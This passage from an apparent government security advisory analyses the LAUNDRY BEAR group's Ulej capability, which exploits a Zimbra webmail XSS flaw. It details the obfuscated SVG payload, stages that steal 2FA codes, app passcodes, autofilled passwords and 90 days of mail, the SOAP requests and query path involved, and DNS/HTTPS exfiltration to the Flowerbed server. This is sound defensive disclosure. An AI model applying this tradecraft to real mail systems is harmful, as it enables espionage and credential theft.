<p>The covert and persistent nature of this activity, along with the absence of any known financial extortion, almost certainly indicates this group’s involvement in espionage activities with Russian government backing. Additionally, extensive Ukrainian targeting, prior to use against U.S. and other NATO allies, outlines an increasing trend within Russian cyber threat groups to target Ukrainian users first—both as a priority target and as a testbench for malicious cyber techniques before broader global deployment.</p>
<h2><strong>Targeting details</strong></h2>
<p>LAUNDRY BEAR has targeted and compromised users in various organizations, including those associated with:</p>
<ul>
<li>the Defense Industrial Base (DIB),  </li>
<li>the federal and local government,</li>
<li>education,</li>
<li>energy,</li>
<li>law enforcement,  </li>
<li>media,  </li>
<li>non-governmental organizations, and</li>
<li>technology.</li>
</ul>
<h2><strong>Technical details</strong></h2>
<p><strong>Note:</strong> This advisory uses the <a href="https://attack.mitre.org/versions/v19/matrices/enterprise/" target="_blank">MITRE ATT&amp;CK® Matrix for Enterprise</a> framework, version 19. This advisory also uses <a href="https://d3fend.mitre.org/" target="_blank">MITRE D3FEND<sup>TM</sup></a> version 1.4.0<a href="https://www.cisa.gov/#f15"><sup>15</sup></a>. See <a href="https://www.cisa.gov/#appendixa">Appendix A</a> and <a href="https://www.cisa.gov/#appendixb">Appendix B</a> for tables of the activity mapped to MITRE ATT&amp;CK and D3FEND tactics, techniques, and countermeasures.</p>
<p><em>Ulej </em>is a novel data exfiltration and aggregation capability, that currently (as of the publication of this report) supports a campaign specifically targeting users of ZCS webmail servers. This capability is used to exploit <a href="https://www.cve.org/CVERecord?id=CVE-2025-66376" target="_blank">CVE-2025-66376</a> [Common Weakness Enumeration (CWE) <a href="https://cwe.mitre.org/data/definitions/79.html" target="_blank">CWE-79: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting'</a>)], but likely could be adapted to exploit other vulnerabilities. It exfiltrates emails and other sensitive user data from a victim’s system immediately after exploitation and stores the data in an actor-controlled unattributable virtual private server (VPS) [<a href="https://attack.mitre.org/versions/v19/techniques/T1074/002/" target="_blank">T1074.002</a>] running LAUNDRY BEAR’s “Flowerbed” collection framework. The collected data is almost certainly further exfiltrated to internal network resources for review and long-term retention.</p>
<h3><em><strong>Reconnaissance</strong></em></h3>
<p>LAUNDRY BEAR uses the <em>Ulej </em>capability to exploit the <a href="https://www.cve.org/CVERecord?id=CVE-2025-66376" target="_blank">CVE-2025-66376</a> vulnerability in organizations using ZCS. This campaign’s targeted victimology and limited exploitation capabilities likely indicate this group manually identifies and targets the victim organizations. LAUNDRY BEAR likely identifies organizations with public-facing Zimbra infrastructure by port scanning [<a href="https://attack.mitre.org/versions/v19/techniques/T1595/" target="_blank">T1595</a>] and fingerprinting datasets easily procured through various commercial vendors [<a href="https://attack.mitre.org/versions/v19/techniques/T1596/005/" target="_blank">T1596.005</a>].  </p>
<p>After identifying a target organization, the group likely compiles email addresses for individual users to target with the exploit [<a href="https://attack.mitre.org/versions/v19/techniques/T1589/002/" target="_blank">T1589.002</a>] from datasets offered by commercial vendors [<a href="https://attack.mitre.org/versions/v19/techniques/T1597/002/" target="_blank">T1597.002</a>], open source intelligence [<a href="https://attack.mitre.org/versions/v19/techniques/T1593/" target="_blank">T1593</a>], or previously exfiltrated data [<a href="https://attack.mitre.org/versions/v19/techniques/T1597/" target="_blank">T1597</a>].  </p>
<h3><em><strong>Resource development </strong></em><a class="ck-anchor"></a></h3>
<p>The actors procure VPSs from a variety of providers [<a href="https://attack.mitre.org/versions/v19/techniques/T1583/003/" target="_blank">T1583.003</a>], including those with Know Your Customer (KYC) requirements, and often use fabricated identities. LAUNDRY BEAR primarily uses Mullvad VPN [<a href="https://attack.mitre.org/versions/v19/techniques/T1583/">T1583</a>] when interacting with these servers, further demonstrating the group’s intent to mask their identity and maintain operations security (OPSEC). After the server is provisioned, an automated process deploys the Docker containers necessary for <em>Ulej’s</em> Flowerbed framework [<a href="https://attack.mitre.org/versions/v19/techniques/T1608/">T1608</a>], which then receives and aggregates the data <em>Ulej</em> exfiltrates. These servers are typically only used for 7-60 days before moving to new infrastructure.</p>
<h4><strong>Flowerbed framework</strong></h4>
<p>Flowerbed is a Python project that uses Docker for containerization. The project includes four different Docker containers:</p>
<ul>
<li>Catcher,</li>
<li>Certbot,</li>
<li>Nginx, and</li>
<li>Gardener.</li>
</ul>
<p>Catcher acts as both a DNS and HTTP server to receive and aggregate exfiltrated victim information [<a href="https://attack.mitre.org/versions/v19/techniques/T1048/">T1048</a>]. For additional information on Catcher, refer to the <a href="https://www.cisa.gov/#exfil1">Exfiltration</a> section of this advisory. Flowerbed’s next container, Certbot, is based on one of the official Certbot containers, which allows for automated generation of Let’s Encrypt certificates using DNS challenges through Cloudflare. This certificate can then be used by the Nginx container, which serves as an HTTPS reverse proxy for Catcher, enabling Flowerbed to disguise some of its exfiltration activity through an encrypted communications channel [<a href="https://attack.mitre.org/versions/v19/techniques/T1048/002/" target="_blank">T1048.002</a>]. The Nginx reverse proxy also validates that the Server Name Indicator (SNI) value contains “*.i.*” prior to forwarding the traffic to Catcher. If the SNI does not contain that string, the Nginx server returns a 444 error to the client. This is likely an attempt to reject non-Ulej connections. Finally, the Gardener container functions as a health check for the Catcher service. Gardener is a simple Python script that validates Catcher correctly receives and processes data.</p>
<p>The simplistic Flowerbed codebase has indications that artificial intelligence (AI) played a role in its development. This highlights how AI is increasingly being used to develop malicious capabilities [<a href="https://attack.mitre.org/versions/v19/techniques/T1588/007/" target="_blank">T1588.007</a>]. The dependence on AI for a simple capability, such as Flowerbed, alongside a previous reliance on open source capabilities, such as Evilginx2 [<a href="https://attack.mitre.org/versions/v19/techniques/T1588/002/" target="_blank">T1588.002</a>], likely indicates a lack of advanced technical knowledge within LAUNDRY BEAR, especially in relation to true software development capabilities.</p>
<h3><em><strong>Initial access</strong></em></h3>
<p>To gain initial access, LAUNDRY BEAR sends an email containing a malicious JavaScript payload to the target [<a href="https://attack.mitre.org/versions/v19/techniques/T1566/" target="_blank">T1566</a>]. Through exploitation of <a href="https://www.cve.org/CVERecord?id=CVE-2025-66376" target="_blank">CVE-2025-66376</a>, this JavaScript payload is immediately executed once the user views the malicious email [<a href="https://attack.mitre.org/versions/v19/techniques/T1203/" target="_blank">T1203</a>], such as the one shown in <a href="https://www.cisa.gov/#figure1"><strong>Figure 1</strong></a>, in the ZCS webmail platform. Since at least November 2025, LAUNDRY BEAR began sending these phishing emails from victim infrastructure through compromised accounts [<a href="https://attack.mitre.org/versions/v19/techniques/T1199/" target="_blank">T1199</a>], as shown in the email metadata in <a href="https://www.cisa.gov/#figure2"><strong>Figure 2</strong></a>. These compromised accounts were likely previous victims of this, or another LAUNDRY BEAR, campaign and their use is intended to further obfuscate and frustrate anti-phishing tools and training.</p>
<p><a class="ck-anchor"></a></p>



<figure class="c-figure c-figure--image" role="group">
  
  <div class="c-figure__media">    <img loading="lazy" src="https://www.cisa.gov/sites/default/files/styles/large/public/2026-07/figure1.png?itok=yrzcl7tK" width="604" height="235" alt="Figure 1: Example of malicious email">



</div>
      <figcaption class="c-figure__caption"><em><strong>Figure 1: Example of malicious email</strong></em></figcaption>
  </figure>
<p><a class="ck-anchor"></a></p>



<figure class="c-figure c-figure--image" role="group">
  
  <div class="c-figure__media">    <img loading="lazy" src="https://www.cisa.gov/sites/default/files/styles/large/public/2026-07/figure2.png?itok=vEulmmyx" width="604" height="102" alt="Figure 2: Headers from an example malicious email">



</div>
      <figcaption class="c-figure__caption"><em><strong>Figure 2: Headers from an example malicious email</strong></em></figcaption>
  </figure>
<p>According to the National Vulnerability Database (NVD), <a href="https://nvd.nist.gov/vuln/detail/CVE-2025-66376" target="_blank">CVE-2025-66376</a> was initially published on 5 January 2026. This vulnerability allows for execution of a JavaScript payload included in email content due to improper sanitization of Cascading Style Sheet’s (CSS) @import directives within an email [<a href="https://www.cisa.gov/#wc5">5</a>]. Because the activity attributed to this campaign began in July 2025—months before Synacor released a patch and the CVE was published—the payload initially exploited a zero-day vulnerability at that time [<a href="https://attack.mitre.org/versions/v19/techniques/T1587/004/" target="_blank">T1587.004</a>].  </p>
<p><strong>Utilization of a zero-day exploit within this campaign demonstrates the ability for even emerging threat groups like LAUNDRY BEAR to operationalize novel exploits into a highly successful capability.</strong></p>
<p>Hidden in LAUNDRY BEAR’s email is a Base64 encoded payload within the “onload” field of a Scalable Vector Graphics (SVG) element [<a href="https://attack.mitre.org/versions/v19/techniques/T1027/017/" target="_blank">T1027.017</a>], as shown in <a href="https://www.cisa.gov/#figure3"><strong>Figure 3</strong></a>. Leading up to the inclusion of this payload in the SVG element are various instances of @import directives, as required to leverage <a href="https://www.cve.org/CVERecord?id=CVE-2025-66376">CVE-2025-66376</a>. This payload includes an XOR encrypted final script encoded in a Base64 inner payload (see <a href="https://www.cisa.gov/#figure3"><strong>Figure 3</strong></a>) [<a href="https://attack.mitre.org/versions/v19/techniques/T1027/013/" target="_blank">T1027.013</a>]. The outer payload decodes and decrypts the inner payload using an XOR function and a hardcoded key and then executes the script contained within the inner payload containing the collection and exfiltration logic. By changing the key used for the XOR encryption of the inner payload or adding additional @import directives with non-functional code [<a href="https://attack.mitre.org/versions/v19/techniques/T1027/010/" target="_blank">T1027.010</a>], LAUNDRY BEAR can easily generate new payloads that bypass basic threat detection signatures. This malicious payload attempts to collect and exfiltrate information in 12 asynchronous stages [<a href="https://attack.mitre.org/versions/v19/techniques/T1119/">T1119</a>]. The stages in order of appearance within the payload are as follows:</p>
<ol>
<li>sendStartPing,</li>
<li>gather_email,</li>
<li>gather_environment,</li>
<li>gather_2fa_codes,</li>
<li>gather_app_password,</li>
<li>gather_device_status,</li>
<li>gather_oauth_consumers,</li>
<li>gather_autocomplete_password,</li>
<li>enable_mail_protocols,</li>
<li>gather_gal,</li>
<li>sendArchives, and</li>
<li>sendFinishPing. </li>
</ol>
<p><a class="ck-anchor"></a></p>



<figure class="c-figure c-figure--image" role="group">
  
  <div class="c-figure__media">    <img loading="lazy" src="https://www.cisa.gov/sites/default/files/styles/large/public/2026-07/figure3_0.png?itok=M-bj5-nb" width="607" height="577" alt="Figure 3: Malicious payload of example email">



</div>
      <figcaption class="c-figure__caption"><em><strong>Figure 3: Malicious payload of example email</strong></em></figcaption>
  </figure>
<p>Use of a zero-day exploit within this campaign demonstrates the ability for even emerging threat groups like LAUNDRY BEAR to operationalize novel exploits into a highly successful capability [<a href="https://attack.mitre.org/versions/v19/techniques/T1587/" target="_blank">T1587</a>].</p>
<h3><em><strong>Persistence and credential access</strong></em><a class="ck-anchor"></a></h3>
<p>To establish sustained persistence into the victim’s email account, the script attempts to modify account preferences and collect authentication information. Any collected credentials are later exfiltrated, as further described in the <a href="https://www.cisa.gov/#exfil1">Exfiltration</a> section below. Other campaigns attributed to LAUNDRY BEAR also demonstrated the group’s ability to circumvent multi-factor authentication through session token replay [<a href="https://attack.mitre.org/versions/v19/techniques/T1550/004/" target="_blank">T1550.004</a>], and the Zimbra campaign follows a similar trend.</p>
<p>The script used in this campaign tries to discover the victim’s email address during the <em>gather_email</em> stage [<a href="https://attack.mitre.org/techniques/T1087/" target="_blank">T1087</a>]. The script searches for this email address in two ways. First, it examines the <em>batchInfoResponse </em>variable, which an HTML script element on the webpage can define, for an email address. Even if the script finds an email address there, it also checks whether it acquired a Cross-Site Request Forgery (CSRF) token as described later in the <a href="https://www.cisa.gov/#collection1">Collection</a> section of this advisory. If so, the script uses the “GetIdentitiesRequest” Simple Object Access Protocol (SOAP) command under the “ZimbraAccount” namespace to determine the victim’s email address [<a href="https://attack.mitre.org/versions/v19/techniques/T1185/" target="_blank">T1185</a>] and then exfiltrates it. However, if the script does not have a CSRF token or the SOAP request fails, the script exfiltrates the email value recovered from the first method instead. If both attempts fail to capture the victim’s email, the script sends a JavaScript Object Notation (JSON) payload with a key of “email” and value of <em>null </em>over HTTPS and does not attempt DNS exfiltration.</p>
<p>During the <em>gather_autocomplete_password</em> stage, the script attempts to collect the victim’s saved password via the autocomplete feature of the victim’s password manager. The script injects two HTML div elements requesting login credentials onto the page outside of the victim’s view, as shown in <a href="https://www.cisa.gov/#figure4"><strong>Figure 4</strong></a><strong> </strong>and <a href="https://www.cisa.gov/#figure5"><strong>Figure 5</strong></a>. After waiting five seconds, the script then attempts to extract the password provided automatically by the password manager from the input element shown in <a href="https://www.cisa.gov/#figure4"><strong>Figure 4</strong></a>. If there is no value in that input field, it checks the password input field shown in <a href="https://www.cisa.gov/#figure5"><strong>Figure 5</strong></a>. If neither input field contains a value, a JSON payload with a key of “autocomplete_password” and value of <em>null </em>is sent over HTTPS and DNS exfiltration is not attempted.</p>
<p><a class="ck-anchor"></a></p>



<figure class="c-figure c-figure--image" role="group">
  
  <div class="c-figure__media">    <img loading="lazy" src="https://www.cisa.gov/sites/default/files/styles/large/public/2026-07/figure4.png?itok=ZOZ8JHZC" width="1024" height="188" alt="Figure 4: First illegitimate login HTML element">



</div>
      <figcaption class="c-figure__caption"><em><strong>Figure 4: First illegitimate login HTML element</strong></em></figcaption>
  </figure>
<p><a class="ck-anchor"></a></p>



<figure class="c-figure c-figure--image" role="group">
  
  <div class="c-figure__media">    <img loading="lazy" src="https://www.cisa.gov/sites/default/files/styles/large/public/2026-07/figure5.png?itok=8xZU_GCa" width="1024" height="115" alt="Figure 5: Second illegitimate login HTML element">



</div>
      <figcaption class="c-figure__caption"><em><strong>Figure 5: Second illegitimate login HTML element</strong></em></figcaption>
  </figure>
<p>LAUNDRY BEAR almost certainly relies on a mail client using the Internet Message Access Protocol (IMAP) for persistent access to the victim’s mailbox. During the <em>enable_mail_protocols</em> stage, a SOAP request leveraging the “ModifyPrefsRequest” command under the “ZimbraAccount” namespace is sent. This request attempts to set the “zimbraPrefImapEnabled” preference to TRUE. While the default setting for “zimbraPrefImapEnabled” is not well documented, this action is almost certainly intended to ensure that IMAP access to the victim’s mailbox is enabled.</p>
<p>ZCS does not support 2FA for some mail clients, including IMAP. To support users who rely on IMAP clients, ZCS allows for the generation of Application Passcodes. Application Passcodes are randomly generated passwords that can be used for clients that cannot support the normal 2FA process to authenticate. During the <em>gather_app_password</em> stage, the script makes a SOAP request using the “CreateAppSpecificPasswordRequest” command under the “ZimbraAccount” namespace to create a new Application Passcode [<a href="https://attack.mitre.org/versions/v19/techniques/T1556/006/" target="_blank">T1556.006</a>]. The SOAP request uses “ZimbraWeb” as the name of the application.</p>
<p>Additionally, the script also attempts to collect 2FA tokens. During the <em>gather_2fa_codes</em> stage, the script makes a SOAP request using the “GetScratchCodesRequest” command under the “ZimbraAccount” namespace. The script then attempts to exfiltrate any non-null 2FA codes collected this way. The number of codes can vary, and each code is exfiltrated to Flowerbed individually.</p>
<h3><em><strong>Collection</strong></em><a class="ck-anchor"></a></h3>
<p>As demonstrated in the <a href="https://www.cisa.gov/#persistence1">Persistence and credential access</a> section, this script relies heavily on SOAP requests to collect victim information. To make these requests, the script aims to acquire the victim’s current CSRF token, which it attempts to access within the webpage’s local storage using localStorage.getItem("csrfToken"). If the script is unable to acquire this CSRF token, it will be unable to make any SOAP requests. In addition to the SOAP commands documented in the <a href="https://www.cisa.gov/#persistence1">Persistence and credential access</a> section, other SOAP commands executed to collect victim information are shown in <a href="https://www.cisa.gov/#table1"><strong>Table 1</strong></a>.</p>
<p><a class="ck-anchor"></a></p>
<table dir="ltr" class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<caption><em><strong>Table 1: Additional SOAP commands used</strong></em></caption>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">
<div class="TableCellContent SCXW195872110 BCX8">
<div class="OutlineElement Ltr SCXW195872110 BCX8">
<p><strong>SOAP Command </strong></p>
</div>
</div>
</th>
<th role="columnheader">
<div class="TableCellContent SCXW195872110 BCX8">
<div class="OutlineElement Ltr SCXW195872110 BCX8">
<p><strong>Namespace </strong></p>
</div>
</div>
</th>
<th role="columnheader">
<div class="TableCellContent SCXW195872110 BCX8">
<div class="OutlineElement Ltr SCXW195872110 BCX8">
<p><strong>Stage </strong></p>
</div>
</div>
</th>
</tr>
</thead>
<tbody>
<tr>
<td>
<div class="TableCellContent SCXW195872110 BCX8">
<div class="OutlineElement Ltr SCXW195872110 BCX8">
<p>GetInfoRequest </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW195872110 BCX8">
<div class="OutlineElement Ltr SCXW195872110 BCX8">
<p>zimbraAccount </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW195872110 BCX8">
<div class="OutlineElement Ltr SCXW195872110 BCX8">
<p>gather_environment </p>
</div>
</div>
</td>
</tr>
<tr>
<td>
<div class="TableCellContent SCXW195872110 BCX8">
<div class="OutlineElement Ltr SCXW195872110 BCX8">
<p>GetDeviceStatusRequest </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW195872110 BCX8">
<div class="OutlineElement Ltr SCXW195872110 BCX8">
<p>zimbraSync </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW195872110 BCX8">
<div class="OutlineElement Ltr SCXW195872110 BCX8">
<p>gather_device_status </p>
</div>
</div>
</td>
</tr>
<tr>
<td>
<div class="TableCellContent SCXW195872110 BCX8">
<div class="OutlineElement Ltr SCXW195872110 BCX8">
<p>GetOAuthConsumersRequest </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW195872110 BCX8">
<div class="OutlineElement Ltr SCXW195872110 BCX8">
<p>zimbraAccount </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW195872110 BCX8">
<div class="OutlineElement Ltr SCXW195872110 BCX8">
<p>gather_oauth_consumers </p>
</div>
</div>
</td>
</tr>
<tr>
<td>
<div class="TableCellContent SCXW195872110 BCX8">
<div class="OutlineElement Ltr SCXW195872110 BCX8">
<p>SearchGalRequest </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW195872110 BCX8">
<div class="OutlineElement Ltr SCXW195872110 BCX8">
<p>zimbraAccount </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW195872110 BCX8">
<div class="OutlineElement Ltr SCXW195872110 BCX8">
<p>gather_gal </p>
</div>
</div>
</td>
</tr>
</tbody>
</table>
<p>The script attempts to collect the victim’s GAL through brute force by searching for each two-character combination from a character set of “abcdefghijklmnopqrstuvwxyz1234567890.-_”. These queries are conducted using 20 batches of SOAP requests with 77 “SearchGalRequest” SOAP commands in each batch except for the last request containing only 58.</p>
<p>During the <em>gather_environment</em> stage, the script attempts to determine which type of ZCS webmail client the victim is using. The script checks the user’s current URL to determine the client type being used, checking for certain indicators (shown in <a href="https://www.cisa.gov/#table2"><strong>Table 2</strong></a>) to determine the client type. The corresponding value is then used as the payload when exfiltrating the client type.</p>
<p><a class="ck-anchor"></a></p>
<table dir="ltr" class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<caption><em><strong>Table 2: ZCS webmail client types</strong></em></caption>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">
<div class="TableCellContent SCXW28945023 BCX8">
<div class="OutlineElement Ltr SCXW28945023 BCX8">
<p><strong>Indicator </strong></p>
</div>
</div>
</th>
<th role="columnheader">
<div class="TableCellContent SCXW28945023 BCX8">
<div class="OutlineElement Ltr SCXW28945023 BCX8">
<p><strong>Client Type </strong></p>
</div>
</div>
</th>
<th role="columnheader">
<div class="TableCellContent SCXW28945023 BCX8">
<div class="OutlineElement Ltr SCXW28945023 BCX8">
<p><strong>Associated Value </strong></p>
</div>
</div>
</th>
</tr>
</thead>
<tbody>
<tr>
<td>
<div class="TableCellContent SCXW28945023 BCX8">
<div class="OutlineElement Ltr SCXW28945023 BCX8">
<p>?client=advanced </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW28945023 BCX8">
<div class="OutlineElement Ltr SCXW28945023 BCX8">
<p>Advanced </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW28945023 BCX8">
<div class="OutlineElement Ltr SCXW28945023 BCX8">
<p>c </p>
</div>
</div>
</td>
</tr>
<tr>
<td>
<div class="TableCellContent SCXW28945023 BCX8">
<div class="OutlineElement Ltr SCXW28945023 BCX8">
<p>/h/ </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW28945023 BCX8">
<div class="OutlineElement Ltr SCXW28945023 BCX8">
<p>Standard </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW28945023 BCX8">
<div class="OutlineElement Ltr SCXW28945023 BCX8">
<p>h </p>
</div>
</div>
</td>
</tr>
<tr>
<td>
<div class="TableCellContent SCXW28945023 BCX8">
<div class="OutlineElement Ltr SCXW28945023 BCX8">
<p>/modern/ </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW28945023 BCX8">
<div class="OutlineElement Ltr SCXW28945023 BCX8">
<p>Modern </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW28945023 BCX8">
<div class="OutlineElement Ltr SCXW28945023 BCX8">
<p>m </p>
</div>
</div>
</td>
</tr>
</tbody>
</table>
<p>As part of collection, the script attempts to harvest any emails not marked as “junk” from the last 90 days from the victim’s account. Emails are collected daily by an HTTP GET request to the URL path, “/home/~/?fmt=tgz&amp;meta=0&amp;query=date:-{DAY_OFFSET}d AND (not in:junk)”. The <em>{DAY_OFFSET}</em> value would be between 0 and 89 representing how many days ago the email was sent or received. To prevent redundant collection and exfiltration of emails, a variable with a name based on the email date being queried, using a format of <em>zd_comp_YYYY-MM-DD</em>, and value of <em>true</em>, is saved to the <em>window.top.localStorage</em> property. This variable is saved regardless of whether the email is successfully exfiltrated.  </p>
<p>According to Mozilla documentation, if the user is not in a private browsing session, any data stored to localStorage does not typically expire. This means that if the user happens to execute the script again from the same computer, the script avoids attempting to re-exfiltrate previously captured emails. However, the script always attempts to pull any emails with a <em>{DAY_OFFSET} </em>of zero. In other words, the script always pulls emails sent or received the same day it is run. After email results are returned from the query for each day of email activity, those results are then passed to Flowerbed as described in the <a href="https://www.cisa.gov/#exfil1">Exfiltration</a> section.</p>
<p>The script also provides LAUNDRY BEAR with telemetry on any errors that occur during the collection process. This is accomplished by executing any collection or exfiltration code through helper functions that contain error handling logic. If an error occurs, a payload containing information on the error itself, the context of the error happening, and the stage in which the error occurred is sent to Flowerbed as described in the <a href="https://www.cisa.gov/#exfil1">Exfiltration</a> section below. For cases where the error occurs within a SOAP request, “:api” is concatenated to the stage value in the payload. If an error occurs during the batch SOAP requests that occur when collecting the GAL of the victim, the stage value will use a format of <em>gather_gal:{VAL}:api</em>. The <em>{VAL}</em> placeholder indicates which batch request, a number from 0 to 19, the error occurred in. Errors that occur during the password autocomplete interception process will use “gather_autocomplete_password:dom” for the stage value. Finally, if an error occurs when attempting to collect or exfiltrate a specific day’s emails, the stage will include which day the error occurred on, using the previously defined placeholder <em>{DAY_OFFSET},</em> with a format of <em>sendArchive:day-{DAY_OFFSET}</em>.</p>
<h3><em><strong>Exfiltration</strong></em><a class="ck-anchor"></a></h3>
<p>At the end of each stage in the collection process, the script attempts to exfiltrate acquired information to Flowerbed. The script primarily relies on two forms of data exfiltration: DNS [<a href="https://attack.mitre.org/versions/v19/techniques/T1048/003/" target="_blank">T1048.003</a>] and HTTPS. Some information is exfiltrated over both the DNS and HTTPS channels.</p>
<p>Prior to exfiltration, a randomized 10- or 11-character alphanumeric string is generated as an identifier for the victim. This identifier is included in the URL of both the DNS- and HTTPS-based exfiltration.  </p>
<h4><strong>DNS exfiltration</strong></h4>
<p>DNS exfiltration occurs through DNS A record queries. To ensure data exfiltrated through DNS is not corrupted when traversing through non-actor-controlled DNS infrastructure, <em>Ulej </em>maintains compliance with RFC 1035, Domain Names - Implementation and Specification, specifically accounting for the case insensitivity and subdomain length requirements. Base32 encoding is used to create a case-insensitive payload. Once the payload is encoded, a period (“.”) is added every 60 characters to ensure each subdomain is under 63 characters long. The script then creates a new image object sourced from a URL with the scheme defined in <a href="https://www.cisa.gov/#figure6"><strong>Figure 6</strong></a>. Any traffic involving DNS exfiltration will have “d-“ prefixing the victim identifier, and the subdomain immediately following indicates the type of information being exfiltrated.</p>
<p><a class="ck-anchor"></a></p>



<figure class="c-figure c-figure--image" role="group">
  
  <div class="c-figure__media">    <img loading="lazy" src="https://www.cisa.gov/sites/default/files/styles/large/public/2026-07/Figure6.png?itok=Tv8RT8o8" width="1024" height="49" alt="Figure 6: Structure for information exfiltrated by DNS">



</div>
      <figcaption class="c-figure__caption"><em><strong>Figure 6: Structure for information exfiltrated by DNS</strong></em></figcaption>
  </figure>
<p>When the script generates an image object, the browser tries to retrieve the complete domain of the URL specified as the source of the image. This triggers a DNS request sent to the actor-controlled server and processed by Flowerbed. <a href="https://www.cisa.gov/#table3"><strong>Table 3</strong></a> lists both the information exfiltrated via DNS and their corresponding data type identifiers in the DNS queries.  </p>
<p><a class="ck-anchor"></a></p>
<table dir="ltr" class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<caption><em><strong>Table 3: DNS exfiltration</strong></em></caption>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">
<div class="TableCellContent SCXW258158484 BCX8">
<div class="OutlineElement Ltr SCXW258158484 BCX8">
<p><strong>Type of Information </strong></p>
</div>
</div>
</th>
<th role="columnheader">
<div class="TableCellContent SCXW258158484 BCX8">
<div class="OutlineElement Ltr SCXW258158484 BCX8">
<p><strong>Exfiltration Stage </strong></p>
</div>
</div>
</th>
<th role="columnheader">
<div class="TableCellContent SCXW258158484 BCX8">
<div class="OutlineElement Ltr SCXW258158484 BCX8">
<p><strong>Data Type </strong></p>
</div>
</div>
</th>
</tr>
</thead>
<tbody>
<tr>
<td>
<div class="TableCellContent SCXW258158484 BCX8">
<div class="OutlineElement Ltr SCXW258158484 BCX8">
<p>Victim’s Email Address </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW258158484 BCX8">
<div class="OutlineElement Ltr SCXW258158484 BCX8">
<p>gather_email </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW258158484 BCX8">
<div class="OutlineElement Ltr SCXW258158484 BCX8">
<p>e </p>
</div>
</div>
</td>
</tr>
<tr>
<td>
<div class="TableCellContent SCXW258158484 BCX8">
<div class="OutlineElement Ltr SCXW258158484 BCX8">
<p>Client Type </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW258158484 BCX8">
<div class="OutlineElement Ltr SCXW258158484 BCX8">
<p>gather_environment </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW258158484 BCX8">
<div class="OutlineElement Ltr SCXW258158484 BCX8">
<p>c </p>
</div>
</div>
</td>
</tr>
<tr>
<td>
<div class="TableCellContent SCXW258158484 BCX8">
<div class="OutlineElement Ltr SCXW258158484 BCX8">
<p>Zimbra Version </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW258158484 BCX8">
<div class="OutlineElement Ltr SCXW258158484 BCX8">
<p>gather_environment  </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW258158484 BCX8">
<div class="OutlineElement Ltr SCXW258158484 BCX8">
<p>v </p>
</div>
</div>
</td>
</tr>
<tr>
<td>
<div class="TableCellContent SCXW258158484 BCX8">
<div class="OutlineElement Ltr SCXW258158484 BCX8">
<p>URL at Time of Exploitation </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW258158484 BCX8">
<div class="OutlineElement Ltr SCXW258158484 BCX8">
<p>gather_environment </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW258158484 BCX8">
<div class="OutlineElement Ltr SCXW258158484 BCX8">
<p>url </p>
</div>
</div>
</td>
</tr>
<tr>
<td>
<div class="TableCellContent SCXW258158484 BCX8">
<div class="OutlineElement Ltr SCXW258158484 BCX8">
<p>2FA Scratch Codes </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW258158484 BCX8">
<div class="OutlineElement Ltr SCXW258158484 BCX8">
<p>gather_2fa_codes </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW258158484 BCX8">
<div class="OutlineElement Ltr SCXW258158484 BCX8">
<p>2fa </p>
</div>
</div>
</td>
</tr>
<tr>
<td>
<div class="TableCellContent SCXW258158484 BCX8">
<div class="OutlineElement Ltr SCXW258158484 BCX8">
<p>Newly Created Application Password </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW258158484 BCX8">
<div class="OutlineElement Ltr SCXW258158484 BCX8">
<p>gather_app_password </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW258158484 BCX8">
<div class="OutlineElement Ltr SCXW258158484 BCX8">
<p>pa </p>
</div>
</div>
</td>
</tr>
<tr>
<td>
<div class="TableCellContent SCXW258158484 BCX8">
<div class="OutlineElement Ltr SCXW258158484 BCX8">
<p>Harvested Autocomplete Password </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW258158484 BCX8">
<div class="OutlineElement Ltr SCXW258158484 BCX8">
<p>gather_autocomplete_password </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW258158484 BCX8">
<div class="OutlineElement Ltr SCXW258158484 BCX8">
<p>pw </p>
</div>
</div>
</td>
</tr>
</tbody>
</table>
<h4><strong>HTTPS exfiltration</strong></h4>
<p>Any information exfiltrated via DNS is also exfiltrated through HTTPS, as well as additional data including email content, contacts, attachments, and error logging information. By using Let’s Encrypt certificates, this group can quickly deploy new infrastructure and leverage encrypted HTTPS communications with valid server certificates when exfiltrating information from the victim’s environment. The HTTPS exfiltration capability only uses two HTTP content types, defined in <a href="https://www.cisa.gov/#table4"><strong>Table 4</strong></a>. Traffic associated with HTTPS exfiltration will use the URL scheme shown in <a href="https://www.cisa.gov/#figure7"><strong>Figure 7</strong></a>.  </p>
<p><a class="ck-anchor"></a></p>
<table dir="ltr" class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
